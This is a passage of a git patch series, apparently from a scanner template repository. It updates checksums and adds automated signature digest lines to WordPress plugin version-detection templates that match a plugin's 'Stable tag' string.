-http/technologies/wordpress/plugins/wordfence.yaml:a5d01c40c96de0bdbf4fd1b517a4b342006421a3 -http/technologies/wordpress/plugins/wordpress-importer.yaml:8d39c0c6c3425e57e2be8f6a5bd8a91e7d3a439c -http/technologies/wordpress/plugins/wordpress-seo.yaml:dc65064e66e43a467b1e9ed2c095cfc0f81af2dd +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:e8dfa9ca66a755e3a2d355be4bc3f6a721618550 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:42cf2cf2c77fdecad7fb821139ed5faccc69e57e -http/technologies/wordpress/plugins/wp-file-manager.yaml:fa86400c421a1a342202da7b6855be94be20456e -http/technologies/wordpress/plugins/wp-google-maps.yaml:a5e4fca1b89b58bebdf9363a523e6f73a527fb39 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:db7f011b671f3ea759d2666e5000f14cfb3091b3 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:86aa482ac992b57460bb31b10b80e47631a3cdec -http/technologies/wordpress/plugins/wp-migrate-db.yaml:b1475c1c208a27f8c7c0242228263e38d81d8434 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:b8d8d39f1a43a008bb7f7f802609028ba323b9e6 -http/technologies/wordpress/plugins/wp-optimize.yaml:c49183c7d82cbdd4479404990625da6818e016e2 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:ce00bf598ebb81449b6ae1669ac203a68d86efd7 -http/technologies/wordpress/plugins/wp-reset.yaml:14c5010a475fa909f28391b7990844fe51a0b2b2 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:daf3725a4ddfba16679e272e295d90112334ee22 -http/technologies/wordpress/plugins/wp-rollback.yaml:a9100438f1a2f8d577ae456d454dfc84c5177501 -http/technologies/wordpress/plugins/wp-seopress.yaml:687273af9942a9e30debdb05bf4ebd1888580346 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:5cbce95addf9da0f12f7267c3377f77a878aab60 -http/technologies/wordpress/plugins/wp-smushit.yaml:4063aad19c268ae2e25c123e911f5d8b9d256ad5 -http/technologies/wordpress/plugins/wp-statistics.yaml:8394f42eff91b17e1dbaf9a4ad9525c60aa61b65 -http/technologies/wordpress/plugins/wp-super-cache.yaml:b4ee4167ddeb2563f825be8c5f8ebf5060be257e +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:f99945a105e98af9e522edcb41c00e3025e312c4 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:56a26c23b1d081d31bd5976146f83be73f5d3e33 -http/technologies/wordpress/plugins/wpforms-lite.yaml:351a14423a10a1dbbee555574add5750946446f7 -http/technologies/wordpress/plugins/wps-hide-login.yaml:5fd357f902adec62bf92ece79af600e26c05eea8 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:600c08bccfe3d8d4946cd8c40c04e7d6fb835245 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1aa020a0a4452fc3a97327aa7417e45436ae6f59 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8867,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:98ad3f9c23c3f08754417333ac80eac604ecda10 +templates-checksum.txt:4193ef091c7925f655faf0f4762ae8c78c13fc1d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 85b40b46a56dfb3bda61318a885520cf8d9588dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:23:36 +0000 Subject: [PATCH 047/247] Auto Template Signing [Thu Jul 11 07:23:36 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749a..4c054eeeecc 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e86bedeb450b6c00402b784bb69954bb107eb89032bdf86aa6bee1f85642080022071b4c446da51fbfa93a2b433bb4dbcf7290de65173eac90931b2de6faf81792a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b632..bc836adc762 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d41463d5a4c0c0478e6853d6486a7ca97f3faa0440db29df441c27c9e4027e1022100dcfee9129d877a444178ce6be652063a715e49dfe70e78b6904095b94405fae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc80..499e8348fb0 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027d8c81efe632e7e622301018d98e84da94e0ea278f65a26144f432d7967ee6002200c52fb3f5d254a57021eea74035e86cfbf67cffc98e50cd9395dcbf2f015e8bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2ed..7cb1de6839d 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa14a16588281e0bf487287326a6e7ae64b7c3e25e8519177edd0e228a2909cd02210096318df93ec532991a3e253c5b46c2cdfc8d62367cd907ff8612bf329affcc8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f556..e00f4808c24 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c3a68a462ffe3aa36521723146e294e8975619ccf559a015be0d83f4300a3fcf02201e86546bb3f11183528d694845d69e23172428561706399cb2153dc550cb8ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d042..9552bd08d6e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d872c24fb5b3a292e80395e2c1e9a434ec22017644d048e8ff195e5401277d2402204a1802db03c5c7f6355d41fcd05601e5e232ab4789ed2edd3435f6ffef72ba3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f4469..28e6014423d 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207525aabc59a84fa412dad31b2b9a2364ccc379f0db1f8fb49dd1dfd083db37d9022100c4dff16a45554d8df7790144b41515775aae4f453b988a752249208b75e8c240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e6..545e43cbbf9 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b475824448f097ee11326913636af0f73d28deef58a68095782dec742605019502200b6f2c7af4af46acf2ec08c4f8bcc973d242628fe9590156f0f998fd69434590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e9..549d3cbdf7a 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220587c2b3db25c6093757834f80c443fbd4814933f42a6b103c7d0ef054f84a75c0221009a3b08df0be2ebfc3140bd09e6311587570302ae269cf33fbf0a7c072e44708a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1f..ce7b81d21ff 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ac869332e400fc71b44d0f0acef1826b0896b1cc144332544f91af09cba2abe02203dacd136bb8e72d2ed87880e25673c9f3aa472fe984780ef772b6e14c934cdc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd5..7583a0a48e3 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220618f81106e9455d93bc66194334dbc98e2cf9ca4dfae037e38762614ab7aac45022100f99e761b9dd6de15a59feadca62407d5f88f35d142f9baf3c45d5bd713455b26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84c..f021db01ac9 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100de7684cddf2ff3d74d74d75bb9e29dc14b7455291a0c3db96435e4b46cd1856702201a0f0e02522df64841fea43d3fefd83f7d28a02d5695eb8cc6ce2fd46ec4be7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2ce..e6b2de6fc6c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071cedbd0fce7954a910fe6ef0b61923bce6c0510d1b3b1649bd4ad0bcb84f44902207f702c35c009c4076fce4efd60a8ec2ba0e8b3c380756bb563fc463ad3a317c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a944..c3090800b9b 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ceca3d50c2ece138da3d886766aaf2bcfaa4b346a3e43f02459eeb8432f31b8d022100ba5f7a18252530c4b93eed380b720eee801618d6aa81b6febea62936eb94730e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dca..fc9929c13ec 100644 --- 